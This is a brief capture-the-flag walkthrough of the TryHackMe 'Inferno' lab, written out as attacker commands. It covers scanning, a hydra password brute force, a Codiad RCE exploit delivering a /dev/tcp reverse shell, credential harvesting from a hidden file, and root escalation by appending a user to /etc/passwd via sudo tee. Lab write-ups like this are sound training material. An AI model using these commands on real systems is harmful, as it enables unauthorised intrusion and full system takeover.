Inferno

Room Link: https://tryhackme.com/r/room/inferno

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Find Pages

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Hydra

Since we have no information at this point we just try admin as the username

Kali

hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-get "/inferno/" -V

After some digging we can see this is a codiad ide which has a RCE exploit

Kali #1

echo 'bash -c "bash -i >/dev/tcp/10.10.183.11/4445 0>&1 2>&1"' | nc -lnvp 4444

Kali #2

nc -nlvp 4445

Kali #3

searchsploit codiad
searchsploit -m multiple/webapps/49705.py
python3 49705.py http://admin:dante1@$VICTIM/inferno/ admin dante1 $KALI 4444 linux

Autocomplete

Victim

python3 -c 'import pty; pty.spawn("/bin/sh")'
ctrl + Z
stty raw -echo;fg

Lateral Movement

Victim

cd /home/dante/Downloads
ls -lah
cat .download.dat

Victim

cat .download.dat

TCP/22 - SSH

Kali

ssh dante@$VICTIM
Password: V1rg1l10h3lpm3

Privilege Escalation

Exploit: https://gtfobins.github.io/gtfobins/tee/

Victim

sudo -l

Victim

LFILE=/etc/passwd
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' | sudo tee -a "$LFILE"

su new
Password: 123